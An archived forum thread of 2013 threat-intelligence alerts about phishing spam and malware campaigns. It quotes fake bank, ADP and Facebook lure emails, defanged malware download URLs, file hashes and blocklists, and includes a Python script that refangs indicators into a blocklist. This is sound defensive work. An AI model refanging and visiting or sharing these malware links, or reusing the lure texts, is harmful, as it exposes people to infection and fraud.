View Full Version : SPAM frauds, fakes, and other MALWARE deliveries...



AplusWebMaster
2013-08-13, 13:33
FYI...

Malware sites to block 13/8/13
- http://blog.dynamoo.com/2013/08/malware-sites-to-block-13813.html
13 August 2013 - "These IPs and domains belong to this gang* and this list follows on from the one I made last week**..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/08/malware-sites-to-block-6813.html
___

Pharma sites to block
- http://blog.dynamoo.com/2013/08/pharma-sites-to-block.html
13 August 2013 - "These fake pharma sites and IPs seem related to these malware domains*, and follows on from this list last week**..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/08/malware-sites-to-block-13813.html

** http://blog.dynamoo.com/2013/08/pharma-sites-to-block-6813.html
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Unpaid Debt Invoice Email Messages - 2013 Aug 13
Malicious Attachment Email Messages - 2013 Aug 12
Fake Money Transfer Notification Email Messages - 2013 Aug 12
Fake Account Payment Notification Email Messages - 2013 Aug 12
Fake Product Order Notification Email Messages - 2013 Aug 12
Fake Package Delivery Failure Notification Email Messages - 2013 Aug 12
Fake Payment Notification Email Messages - 2013 Aug 12
Fake Bank Details Reconfirmation Email Messages - 2013 Aug 12
Fake Documents Attachment Email Messages - 2013 Aug 12
Fake Portuguese Electrical Equipment Invoice Notification Email Messages - 2013 Aug 12
Fake Bank Payment Transfer Notification Email Messages - 2013 Aug 12
Fake Banking Account Information Email Messages - 2013 Aug 12
(More detail and links at the cisco URL above.)
___

LinkedIn Connection Spam
- http://threattrack.tumblr.com/post/58154197039/linkedin-connection-spam
Aug. 13, 2013 - "Subjects Seen:
Invitation to connect on LinkedIn
Typical e-mail details:
<removed> wants to connect with you on LinkedIn.

Malicious URLs
bobbiler.corewaysolution .com/images/wp-gdt.php?x95S4F4MY33PRBG0W
sharperspill .biz/closest/i9jfuhioejskveohnuojfir.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/13ed45df65f2af6e95bfea2edb9ea921/tumblr_inline_mrh6bwqsx91qz4rgp.png
___

CNN Breaking News Rehtaeh Parsons Spam
- http://threattrack.tumblr.com/post/58154735687/cnn-breaking-news-rehtaeh-parsons-spam
Aug. 13, 2013 - "Subjects Seen:
CNN: ” Canadian teenager Rehtaeh Parsons”
Typical e-mail details:
2 face charges in case of Canadian girl who hanged self after alleged rape
Canadian teenager Rehtaeh Parsons
Two 18-year-old men face child pornography charges in connection with the case of a 17-year-old girl who hanged herself after she was allegedly gang-raped and bullied online, Canadian authorities said Thursday evening. Full story »

Malicious URLs
retailers.truelinkswear .com/rundown/index.html
dp56148868.lolipop .jp/numeracy/index.html
ftp(DOT)equinejournal .com/apogee/index.html
ead-togo .com/croons/index.html
guterprotectionperfection .com/topic/able_disturb_planning.php

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/855def800a17058b6a6b61ca991cad41/tumblr_inline_mrh6o3wH431qz4rgp.png
___

Fake Bank of America SPAM / Instructions Secured E-mail.zip
- http://blog.dynamoo.com/2013/08/bank-of-american-spam-instructions.html
13 August 2013 - "This fake Bank of America spam has a malicious attachment:
Date: Tue, 13 Aug 2013 09:35:13 -0500 [10:35:13 EDT]
From: "Alphonso.Wilcox" [Alphonso.Wilcox @bankofamerica .com]
Subject: Instructions Secured E-mail.pdf
I will be forwarding the application through a secure e-mail. Attached are instructions for you to create a password to open the secure e-mails from us. Just a bit of security for when we transmit confidential information.
Thanks,
Amado.Underwood
Bank of America
Principal Business Relationship Manager...

Attached to the message is a file Instructions Secured E-mail.zip which contains an executable file Instructions Secured E-mail.exe with an icon to make it look like a PDF file.
The detection rate for this initial malware is just 9/45 at VirusTotal**.
This is a pony/gate downloader which attempts to download from [donotclick]guterprotectionperfection.com/ponyb/gate.php on 192.81.135.132 (Linode, US). This is the same IP as used in this attack*, and it also utilises a -hijacked- GoDaddy domain.
The download then attempts to download a second stage from the following locations (as well as installing all sorts of hooks into your system):
[donotclick]Missionsearchjobs .com/D5F7G.exe
[donotclick]betterbacksystems .com/kvq.exe
[donotclick]www.printdirectadvertising .com/vfMJH.exe
[donotclick]S381195155.onlinehome .us/vmkCQg8N.exe
The second stage has an even lower detection rate of just 3/45*** ...
Recommended blocklist:
192.81.135.132
guterprotectionperfection .com
Missionsearchjobs .com
betterbacksystems .com
www .printdirectadvertising .com
S381195155.onlinehome .us "
* http://blog.dynamoo.com/2013/08/facebook-spam-guterhelmetcom.html

** https://www.virustotal.com/en-gb/file/f26a77b7df7f2f796ffd3961ed1fd48cc3b27629925f583812b2cee9dcd22177/analysis/1376406778/

*** https://www.virustotal.com/en-gb/file/0aa6884451982533ebf8d62c258182452966a8d24e43d3396fe2b4c8f94fff81/analysis/1376407672/

:fear: :mad:
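The Dynamoo and ThreatTrack write-ups quoted in this post list their indicators in defanged form (a space before the TLD, `(DOT)` for a dot, a `[donotclick]` prefix, a space before the path) so that nobody clicks them by accident. The following Python, added here as an editorial example and not code from any of the quoted sources, turns such lists back into a de-duplicated blocklist of hostnames, single IPs and CIDR networks, and drops any single IP already covered by a listed network. The sample lines are constructed in the same formats the posts use, with made-up domain names and RFC 5737 documentation addresses.

```python
import ipaddress
import re

# Constructed sample lines in the defanged styles used by the quoted posts:
# "[donotclick]" prefix, a space before the TLD, "(DOT)", a space before the path.
# Domains are made up and the addresses are RFC 5737 documentation ranges.
SAMPLE_LINES = """\
Recommended blocklist:
198.51.100.96/28
[donotclick]malware-example .com/ponyb/gate.php
ftp(DOT)hacked-example .com/apogee/index.html
www .malware-example .com/vfMJH.exe
[donotclick]192.0.2.10 /39UvZmv.exe
198.51.100.100
192.0.2.10
malware-example .com "
"""

# Each (pattern, replacement) undoes one defanging convention.
DEFANG_RULES = [
    (re.compile(r"^\[donotclick\]", re.IGNORECASE), ""),
    (re.compile(r"\(dot\)", re.IGNORECASE), "."),
    (re.compile(r"\s+\."), "."),   # "example .com"      -> "example.com"
    (re.compile(r"\s+/"), "/"),    # "192.0.2.10 /x.exe" -> "192.0.2.10/x.exe"
]

# Hostname: two or more dot-separated labels of letters, digits and hyphens.
HOST_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$"
)


def refang(line: str) -> str:
    """Strip quoting and whitespace, then reverse the defanging conventions."""
    s = line.strip().strip('"').strip()
    for pattern, replacement in DEFANG_RULES:
        s = pattern.sub(replacement, s)
    return s


def classify(indicator: str):
    """Return ("cidr", ip_network), ("ip", ip_address) or ("host", str); None if not an indicator."""
    head, _, tail = indicator.partition("/")
    if tail.isdigit():  # "198.51.100.96/28": the whole string is a network
        try:
            return "cidr", ipaddress.ip_network(indicator, strict=False)
        except ValueError:
            return None
    host = head.lower()  # anything after the first "/" is a path; we block by host
    try:
        return "ip", ipaddress.ip_address(host)
    except ValueError:
        pass
    if HOST_RE.match(host):
        return "host", host
    return None  # prose such as "Recommended blocklist:" is silently skipped


def build_blocklist(text: str) -> dict:
    """Parse defanged indicator lines into de-duplicated networks, IPs and hosts."""
    networks, ips, hosts = set(), set(), set()
    for line in text.splitlines():
        s = refang(line)
        if not s:
            continue
        kind_value = classify(s)
        if kind_value is None:
            continue
        kind, value = kind_value
        if kind == "cidr":
            networks.add(value)
        elif kind == "ip":
            ips.add(value)
        else:
            hosts.add(value)
    # A single address already inside a listed network adds nothing; drop it.
    ips = {ip for ip in ips if not any(ip in net for net in networks)}
    return {
        "networks": [str(n) for n in sorted(networks)],
        "ips": [str(ip) for ip in sorted(ips)],
        "hosts": sorted(hosts),
    }


if __name__ == "__main__":
    for kind, entries in build_blocklist(SAMPLE_LINES).items():
        print(kind)
        for entry in entries:
            print("  " + entry)
```

Paths are deliberately discarded: the posts recommend blocking at host or IP level, and the same hijacked domain tends to reappear with a different path a few days later. Mixed IPv4/IPv6 lists would need the sort keys split by version; the quoted posts contain only IPv4.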

AplusWebMaster
2013-08-14, 15:12
FYI...

Bogus Firefox updates
- https://net-security.org/malware_news.php?id=2559
Aug. 13, 2013 - "A series of Internet campaigns pushing bogus Firefox updates onto unwary users have been spotted by researchers, and among them is one that lures them in through “Green Card Lottery” ads... According to ThreatTrack's analysis*, the website is capable of detecting which browser the user uses and to recommend an update for it. Nevertheless, the offered "update" is always the same: Firefox v13 (long outdated - the current version is 23), with several "add-ons, adware, toolbars and other malicious and irritating accompaniments" also trying to get installed via the installation wizard:
> http://www.net-security.org/images/articles/tt-13082013.jpg
Among this tag-along software is the Delta Toolbar, Webcake (a browser add-on that, among other things, serves ads), Optimizer Pro (a questionable PC-tune-up program), QuickShare (a deceptive browser plugin that steals data and redirects to unwanted websites) and an ad for “unlimited cloud storage”. All this "crapware" is sure to bring grief to the victims. It will slow down their computer, for sure, but the biggest problem is that they will end up with an outdated browser that can be successfully targeted with drive-by-download schemes, more additional malware and they will likely become victims of identity theft in the long run..."
* http://www.threattracksecurity.com/it-blog/outdated-browser-detected-firefox-update/
___

Malicious Spam Targets Virgin Media Patrons, Consul General
- http://www.threattracksecurity.com/it-blog/malicious-spam-targets-virgin-media-patrons-consul-general/
Aug. 13, 2013 - "... a fresh campaign of malicious spam that purports to originate from various brands and names but delivers the same malicious attachment to recipients. As of this time of writing, the spam is disguised as a mail coming from Virgin Media* and a notification of an expiring car insurance addressed to the Consul General of Suriname**... detections we have for related malicious files from these spam, as of this writing:
- Both compressed files are detected as Trojan.Zip.Bredozp.b (v).
- The uncompressed .EXE files, which are essentially one and the same, are detected as Win32.Malware!Drop.
The file it downloads is malicious, and it changes at random..."
* http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/virgin-media-spam.png

** http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/08/car-insurance-spam.png
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Scanned Document Attachment Email Messages - 2013 Aug 14
Fake MMS Notification Email Messages - 2013 Aug 14
Fake Package Delivery Failure Notification Email Messages - 2013 Aug 14
Fake Package Delivery Information Email Messages - 2013 Aug 14
Fake Payment Confirmation Notification Email Messages - 2013 Aug 13
Fake Secure Message Notification Email Messages - 2013 Aug 13
Fake Debt Collection Notice Email Messages - 2013 Aug 13
Malicious Attachment Email Messages - 2013 Aug 13
Fake Account Payment Notification Email Messages - 2013 Aug 13
Fake Product Purchase Order Email Messages - 2013 Aug 13
Fake Xerox Scan Attachment Email Messages - 2013 Aug 13
Fake UPS Parcel Notification Email Messages - 2013 Aug 13
Fake Bank Payment Transfer Notification Email Messages - 2013 Aug 13
Fake Product Services Specification Request Email Messages - 2013 Aug 13
Fake Unpaid Debt Invoice Email Messages - 2013 Aug 13
(More detail and links at the cisco URL above.)
___

Twitter Spam ...
- http://krebsonsecurity.com/2013/08/buying-battles-in-the-war-on-twitter-spam/
Aug 14, 2013 - "The success of social networking community Twitter has given rise to an entire shadow economy that peddles -dummy- Twitter accounts by the thousands, primarily to spammers, scammers and malware purveyors. But new research on identifying bogus accounts has helped Twitter to drastically deplete the stockpile of existing accounts for sale, and holds the promise of driving up costs for both vendors of these shady services and their customers. Twitter prohibits the sale and auto-creation of accounts, and the company routinely suspends accounts created in violation of that policy. But according to researchers from George Mason University and the University of California, Berkeley, Twitter traditionally has done so only -after- these fraudulent accounts have been used to spam and attack legitimate Twitter users..."
(More detail at the krebsonsecurity URL above.)
___

Wells Fargo Important Documents Spam
- http://threattrack.tumblr.com/post/58242338970/wells-fargo-important-documents-spam
Aug. 14, 2013 - "Subjects Seen:
IMPORTANT Documents - WellsFargo
Typical e-mail details:
Please review attached files.
Eleanor_Wyatt
Wells Fargo Advisors
817-246-9671 office

Malicious URLs
gutterprosmaryland .com/forum/viewtopic.php
gutterhelmetleafguardgutterprotection .com/forum/viewtopic.php
gutterguardbuyersguide .com/forum/viewtopic.php
gutterglovegutterprotection .com/forum/viewtopic.php
dp55197480.lolipop .jp/1ayPTHK.exe
roundaboutcellars .com/Utuw1.exe
bbsmfg .biz/VKPqrms.exe
caribbeancinemas .net/MLEYCY9.exe

- https://www.virustotal.com/en/ip-address/64.71.35.14/information/

Malicious File Name and MD5:
DOC_<e-mail>.zip (B1342413F0AEE3E6440453689D26803B)
DOC_{_MAILTO_USERNAME}.exe (ABAFB7DA0F23112064F6BC3A1F93DDF6)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/058ad51983943283c252add34ea3da0b/tumblr_inline_mriyb83O4Y1qz4rgp.png
___

Fake ADP SPAM / hubbywifeburgers .com
- http://blog.dynamoo.com/2013/08/adp-spam-hubbywifeburgerscom.html
14 Aug 2013 - "This fake ADP spam leads to malware on hubbywifeburgers .com:
Date: Wed, 14 Aug 2013 08:58:12 -0700 [11:58:12 EDT]
From: "ADPClientServices @adp .com" [service @citibank .com]
Subject: ADP Security Management Update
ADP Security Management Update
Reference ID: 39866
Dear ADP Client August 2013
This message is to inform you of the upcoming “Phase 2” enhancement to ADP Security Management (formally ADP Netsecure). This is where you manage your users' access to ADP's Internet services, and includes the self-service registration process.
Effective August 15th, ADP Security Management will reflect a new user interface. This will include tasks such as Account Maintenance, User Maintenance, and Company Maintenance within Security Management.
Please review the following information:
• Click here to view more details of the enhancements in Phase 2
• Complete the What's New in Security Management Service here (Expected to take about 15 minutes)... The information contained in this email is intended only for the individual(s) addressed in this message and may contain privileged and/or confidential information that is exempt from disclosure under applicable law.

Screenshot: https://lh3.ggpht.com/-33hn5xJdiRw/UgvV5vzDLkI/AAAAAAAABxM/-IcZiCFuBLo/s1600/adp-spam2.png

Yeah.. click the link. What could possibly go wrong? Well, first you go to a legitimate -hacked- site that tried to load one of the following three scripts:
[donotclick]e-equus.kei .pl/perusing/cassie.js
[donotclick]cncnc .biz/pothooks/addict.js
[donotclick]khalidkala .com/immigration/unkind.js
From there, the victim is sent to a malware site that uses a -hijacked- GoDaddy domain at [donotclick]hubbywifeburgers .com/topic/nearby-promptly.php hosted on 199.195.116.51 (A2 Hosting, US - report here*). This IP probably contains other hijacked domains from the same owner.
Recommended blocklist:
199.195.116.51
hubbywifeburgers .com
e-equus.kei .pl
cncnc .biz
khalidkala .com "
* https://www.virustotal.com/en/ip-address/199.195.116.51/information/

:mad: :fear::fear:

AplusWebMaster
2013-08-15, 17:16
FYI...

Something evil on 162.211.231.16
- http://blog.dynamoo.com/2013/08/something-evil-on-16221123116.html
15 August 2013 - "The server at 162.211.231.16 (IT7 Networks, Canada) is currently being used in injection attacks (example*) which have been going on for some time [1] [2] and uses several domains... All the domains are very recently registered by GoDaddy. The WHOIS details for brigitteunderwear .com (also registered by GoDaddy in 2006) are consistent, but I've seen enough hijacked GoDaddy domains recently to be suspicious that there could be an element of identity theft here, and the named person may well have nothing to do with this attack. I haven't had time to poke around at the payload too much, but this could well be a good IP to block, or alternatively use the list of domains that I have identified below (it may not be comprehensive, though)
Recommended blocklist:
162.211.231.16 ..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/report.php?id=4568967

[1] https://www.virustotal.com/en-gb/ip-address/162.211.231.16/information/

[2] http://urlquery.net/search.php?q=162.211.231.16&type=string&start=2013-07-31&end=2013-08-15&max=50
___

Fake "INCOMING FAX REPORT" SPAM / chellebelledesigns .com
- http://blog.dynamoo.com/2013/08/incoming-fax-report-spam.html
15 August 2013 - "A facsimile transmission. How quaint. Of course, it isn't.. the link in the spam goes to a malicious page on chellebelledesigns .com:
From: Administrator [administrator @victimdomain]
Date: 15 August 2013 16:08
Subject: INCOMING FAX REPORT : Remote ID: 1043524020
***********************INCOMINGFAXREPORT*****************
INCOMING FAX REPORT
*********************************************************
Date/Time: 07/25/2013 02:12:11 EST
Speed: 66387 bps
Connection time: 04:06
Pages: 0
Resolution: Normal
Remote ID: 1043524020
Line number: 7
DTMF/DID:
Description: June Payroll
Click here to view the file online
*********************************************************

Note that the spam appears to come "from" the "Administrator" in the victim's own domain. This email address is a forgery, so don't worry about it. If you are daft enough to click the link in the email you go to a legitimate -hacked- site and then on to one of three scripts:
[donotclick]millionaireheaven .com/mable/rework.js
[donotclick]pettigrew .us/airheads/testier.js
[donotclick]www .situ-ingenieurgeologie .de/tuesday/alleviation.js
from there on, the victim is forwarded to a malicious landing page at [donotclick]chellebelledesigns .com/topic/conclusion-western.php using a hacked GoDaddy domain on 173.246.104.55 (Gandi, US). There are other hijacked GoDaddy domains on the same server...
Recommended blocklist:
173.246.104.55 ..."
(More domains listed at the dynamoo URL above.)

- https://www.virustotal.com/en/ip-address/173.246.104.55/information/
___

UPS Quantum View Spam
- http://threattrack.tumblr.com/post/58338584106/ups-quantum-view-spam
Aug. 15, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel <random> )
Typical e-mail details:
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.

Malicious URLs
chellebelledesigns .com/ponyb/gate.php
1800callabe .com/ponyb/gate.php
abemoussa .com/ponyb/gate.php
keralahouseboatstourpackages .com/FXx.exe

Malicious File Name and MD5:
UPS-Label_<random>.zip (607F7CBD6CEF3DDD5F5DB88612FC91B6)
UPS-Label_<date>.exe
(782D6C5633D139704221E927782195E0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4cbd61e5297fb8ae3aeb8970fb72312e/tumblr_inline_mrkyb1P4hG1qz4rgp.png

:fear: :mad:

AplusWebMaster
2013-08-16, 20:09
FYI...

Fake ADP SPAM / ADP_week_invoice.zip|exe
- http://blog.dynamoo.com/2013/08/adp-spam-adpweekinvoicezipexe.html
16 August 2013 - "This fake ADP spam has a malicious attachment:
Date: Fri, 16 Aug 2013 09:57:59 -0500 [10:57:59 EDT]
From: "run.payroll.invoice @adp .com" [run.payroll.invoice @adp .com]
Subject: ADP Payroll INVOICE for week ending 08/16/2013
Your ADP Payroll invoice for last week is attached for your review. If you have any
questions regarding this invoice, please contact your ADP service team at the number
provided on the invoice for assistance.
Thank you for choosing ADP Payroll.
Important: Please do not respond to this message. It comes from an unattended mailbox.

There is an attachment ADP_week_invoice.zip which in turn contains a malicious executable file ADP_week_invoice.exe. The payload is exactly the same as this* other malicious spam run which is running in parallel."
* http://blog.dynamoo.com/2013/08/ceo-portal-statements-notices-event.html

ADP Payroll Invoice Spam
- http://threattrack.tumblr.com/post/58422233895/adp-payroll-invoice-spam
16 August 2013 - "Subjects Seen:
ADP Payroll INVOICE for week ending 08/16/2013
Typical e-mail details:
Your ADP Payroll invoice for last week is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Thank you for choosing ADP Payroll.

Malicious URLs
hubbywifeco .com/forum/viewtopic.php
hubbywifedesigns .com/forum/viewtopic.php
hubbywifedesserts .com/forum/viewtopic.php
hubbywifefoods .com/forum/viewtopic.php
208.106.130.52 /39UvZmv.exe
demoscreactivo .com/DKM9.exe
roundaboutcellars .com/Utuw1.exe
bbsmfg.biz/VKPqrms .exe
cccustomerctr .com/39UvZmv.exe

Malicious File Name and MD5:
ADP_week_invoice.zip (8C67BC641A95379867C4B9EBAE68446A)
ADP_week_invoice.exe
(6EBF2EA3DB16B3E912068D0A9E33320E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ce1dfc0558b95edf50e52a843b3ae948/tumblr_inline_mrmold4lru1qz4rgp.png
___

Fake Wells Fargo SPAM "CEO Portal Statements & Notices Event" -report_{DIGIT[12]}.exe
- http://blog.dynamoo.com/2013/08/ceo-portal-statements-notices-event.html
16 August 2013 - "This fake Wells Fargo email has a malicious attachment:
Date: Fri, 16 Aug 2013 09:51:17 -0500 [10:51:17 EDT]
From: Wells Fargo Event Messaging Admin [ofsrep.ceosmuigw @wellsfargo .com]
Subject: CEO Portal Statements & Notices Event
Wells Fargo
Commercial Electronic Office (CEO) Portal Statements & Notices Event: Multiple Download Request Available
Your Deposit Adjustment Notices is now available. To access your information please download attached report and open Statements & Notices file.
Date/Time Stamp: Fri, 16 Aug 2013 09:51:17 -0500
Request Name: MM3P85NRLOXLOFJ
Event Message ID: S045-77988311
Please do not reply to this email.

The email has an attachment called report_625859705821.zip which in turn contains an executable report_{DIGIT[12]}.exe (which presumably is an error) which has a VirusTotal detection rate of 9/46*. The Malwr report shows that this malware does various things**, including an HTTP request to a hijacked GoDaddy domain at [donotclick]hubbywifeco .com/forum/viewtopic.php hosted on 66.151.138.80 (Nuclear Fallout Enterprises, US) which is shared with another -hijacked- domain, hubbywifecakes .com.
From there, another executable is downloaded from one of the following locations:
[donotclick]208.106.130.52 /39UvZmv.exe
[donotclick]demoscreactivo .com/DKM9.exe
[donotclick]roundaboutcellars .com/Utuw1.exe
[donotclick]bbsmfg .biz/VKPqrms.exe
This executable has an even lower detection rate of just 5/46***... Blocking EXE-in-ZIP files like this at your perimeter is an excellent idea if you can do it.
Recommended blocklist:
66.151.138.80
hubbywifeco .com
hubbywifecakes .com
208.106.130.52
demoscreactivo .com
roundaboutcellars .com
bbsmfg .biz "
* https://www.virustotal.com/en-gb/file/a2fec44b5bc4abdb7c21589a107e379b49f7b4e559d16a1a4bcd6d06ceacfbea/analysis/1376665654/

** https://malwr.com/analysis/NjAxNGMwYmRiMWNjNDIzMDhlMmIxMjgwYmJlMWY3YzU/

*** https://www.virustotal.com/en-gb/file/1ba0ee97381c7e26589f56a8e45212c784ccfc41b9bb57eb783964be5afb49c9/analysis/1376666041/

- https://www.virustotal.com/en-gb/ip-address/66.151.138.80/information/

- https://www.virustotal.com/en-gb/ip-address/208.106.130.52/information/

:mad::fear::sad:

AplusWebMaster
2013-08-19, 13:27
FYI...

Malware sites to block 19/8/13
- http://blog.dynamoo.com/2013/08/malware-sites-to-block-19813.html
19 August 2013 - "These sites and IPs belong to this gang*, and this list follows on from this one**..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika

** http://blog.dynamoo.com/2013/08/malware-sites-to-block-13813.html
___

Fake Facebook SPAM / hubbywifewines .com
- http://blog.dynamoo.com/2013/08/facebook-spam-hubbywifewinescom.html
19 August 2013 - "This fake Facebook spam leads to malware on hubbywifewines .com:
Date: Mon, 19 Aug 2013 16:20:06 +0200 [10:20:06 EDT]
From: Facebook [update+hiehdzge @facebookmail .com]
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted].net at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

The link in the email goes to a legitimate -hacked- site and then loads one or more of these three scripts:
[donotclick]ftp.hotwindsaunausa .com/clingy/concord.js
[donotclick]katchthedeal .sg/stilling/rifts.js
[donotclick]ftp.navaglia .it/gazebo/cowboys.js
The victim is then forwarded to a malware landing page using a hijacked GoDaddy domain at [donotclick]hubbywifewines .com/topic/able_disturb_planning.php hosted on 72.5.102.192* (Nuclear Fallout Enterprises, US) along with another hijacked domain of hubbywifefoods .com.
Recommended blocklist:
72.5.102.192
hubbywifewines .com
hubbywifefoods .com
ftp.hotwindsaunausa .com
katchthedeal .sg
ftp.navaglia .it"
* https://www.virustotal.com/en/ip-address/72.5.102.192/information/
___

Booking.com Confirmation Spam
- http://threattrack.tumblr.com/post/58704894229/booking-com-confirmation-spam
Aug. 19, 2013 - "Subjects Seen:
Confirmation <random>
Typical e-mail details:
BOOKING CONFIRMATION
Issued: 08/18/2013
BEDDING AND INCLUSIONS SHOWN IN ATTACHED FILE
====================================
Confirmation number: <removed>
Booking source: booking.com
(please refer to this brand when
communicating with the guest)
BOOKING SUMMARY
Check in: 29-Aug-2013
Check out: 31-Aug-2013
Total number of rooms: 1 per night
Total number of room nights: 1 (1 room for 1 night each)
Total booking amount: $314.00
Room: 1 Night 1-2 people
Number of guests: Adults: 1 Children: 0
Bedding configuration: One or 2 People
=====Comments=====
Guest comments: non-smoking
Any comments from the guest are by request only and have not been guaranteed...
The guest is also aware that you may require them to provide a security deposit at
check-in to guarantee payment of any incidental charges.
The Team Booking.com

Malicious File Name and MD5:
BOOKING ISSUED 18.Aug.2013.zip (61EE0B0EE92F717D50F42EB0171BAD6E)
BOOKING ISSUED 18.Aug.2013.pdf.exe (948FD2EA728F38886DF824AA2BB7FD3A)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1f3cac9ae5c582f38bb7352037bd82ff/tumblr_inline_mrsd6ucgl61qz4rgp.png
___

Fake Facebook password SPAM / frankcremascocabinets .com
- http://blog.dynamoo.com/2013/08/you-requested-new-facebook-password.html
19 August 2013 - "This fake Facebook spam follows on from this one*, but has a different malicious landing page at frankcremascocabinets .com:
From: Facebook [update+hiehdzge @facebookmail .com]
Date: 19 August 2013 17:38
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

The link in the email goes to a legitimate -hacked- site which then tries to load one or more of the following three scripts:
[donotclick]ftp.hotwindsaunausa .com/clingy/concord.js
[donotclick]katchthedeal .sg/stilling/rifts.js
[donotclick]ftp.navaglia .it/gazebo/cowboys.js
The victim is then directed to a malware payload at [donotclick]frankcremascocabinets .com/topic/able_disturb_planning.php hosted on 184.95.37.102 (Secured Servers, US / Jolly Works Hosting, Philippines). This domain is a hijacked GoDaddy domain and there are several others on the same server...
Recommended blocklist:
184.95.37.96/28
ftp.hotwindsaunausa .com
katchthedeal .sg
ftp.navaglia .it
giuseppepiruzza .com
frankcremascocabinets .com
gordonpoint .biz
hitechcreature .com
frankcremasco .com "
* http://blog.dynamoo.com/2013/08/facebook-spam-hubbywifewinescom.html

- https://www.virustotal.com/en/ip-address/184.95.37.102/information/
___

UK Tax-Themed Spam leads to ZeuS/ZBOT
- http://blog.trendmicro.com/trendlabs-security-intelligence/uk-tax-themed-spam-leads-to-zeuszbot/
Aug 19, 2013 - "Tax-themed spam, particularly in the United States, is already considered a staple in the threat landscape. However, a recent spam run targeting taxpayers in the United Kingdom shows that this threat is never exclusive to a region. Besides being timely, these messages contain TSPY_FAREIT, which download a ZeuS/ZBOT variant, notorious for stealing information related to online banking sites. We found a sample of an email message that appears to be from HM Revenue and Customs in the UK. It notifies users of their VAT return receipt, something that might appear timely to unsuspecting users since the deadline for VAT returns and payments was last August 7. To further convince users of its validity, the message states that the email was “scanned for viruses”. Sample spam with alleged VAT return “receipt”:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/08/Tax-season-uk-spam.jpg
The message contains an attachment, which is supposed to be the receipt for the VAT return. But based on our findings, the attachment is (expectedly) a malware detected as TSPY_FAREIT.ADI. Once executed, the malware steals varied information from the system, such as those related to: FTP clients, file managers, and email... The data stealing does not stop there. TSPY_FAREIT.ADI downloads another malware, specifically TSPY_ZBOT.ADD. As expected of any ZeuS/ZBOT variant, the malware downloads configuration file(s) from randomly generated IP addresses. The said file also contains a list of targeted online banking and finance-related sites and the URLs where it sends the gathered information. The cybercriminals behind this threat are obviously taking advantage of the recent tax return deadline in the UK. But the real concern here is the severity of the information to be stolen. Aside from the email and FTP credentials, which are profitable in the underground market, the bad guys are also gunning for the victims’ online banking accounts. Once they get hold of users’ banking and financial credentials, they can either sell them on the digital underground or use these to initiate unauthorized money transfers leading to actual financial loss... we noted the increase of online banking malware in the past quarter and how the CARBERP’s “leaked” source code may lead to more variety for this threat. Thus, it is important for users to double-check the messages they receive and to be careful in opening any attachments from unverified sources. As an added precaution, always implement your systems with the latest security updates from vendors..."
___

Fake Citi SPAM / securedoc.zip
- http://blog.dynamoo.com/2013/08/you-have-received-secure-message-spam.html
19 August 2013 - "This fake Citi spam contains a malicious attachment:
Date: Mon, 19 Aug 2013 20:24:27 +0000 [16:24:27 EDT]
From: "secure.email @citi .com" [secure.email @citi .com]
Subject: You have received a secure message
Read your secure message by opening the attachment, securedoc. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it with Internet Explorer.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Citi Secure Email Help Desk at (866) 535-2504.
First time users - will need to register after opening the attachment...

Attached is a file securedoc.zip which in turn contains a malicious executable securedoc.exe which has a very low detection rate at VirusTotal of just 2/46*. The Malwr analysis** (and also ThreatExpert***) shows that the file first connects to [donotclick]frankcremascocabinets .com/forum/viewtopic.php (a -hijacked- GoDaddy domain on 184.95.37.102 (Secured Servers, US / Jolly Works Hosting, Philippines)) as seen before here, and it then tries to download additional components from:
[donotclick]lobbyarkansas .com/0d8H.exe
[donotclick]ftp.ixcenter .com/GMMo6.exe
[donotclick]faithful-ftp .com/kFbWXZX.exe
This second part has another very low VirusTotal detection rate of just 3/46****...
Recommended blocklist:
184.95.37.96/28
frankcremascocabinets .com
giuseppepiruzza .com
gordonpoint .biz
gordonpoint .info
hitechcreature .com
frankcremasco .com
lobbyarkansas .com
ftp.ixcenter .com
faithful-ftp .com "
* https://www.virustotal.com/en/file/25ce3d9e23e53300bc0c166c2e6e768554b51b8d169ee8ac6e07ff038125fe61/analysis/1376945701/

** https://malwr.com/analysis/NjcwNGFhOWNjY2Y3NGNhMDgwNDU3NjdhNjk5ZDA1MTI/

*** http://www.threatexpert.com/report.aspx?md5=007da88f903a5c2c4fbf106d28218cf9

**** https://www.virustotal.com/en/file/2807f7c140029c6cb117aa7418f4eac1314fcdaa75d9be16cd26c47ff813f8c7/analysis/1376946672/

:fear::mad:
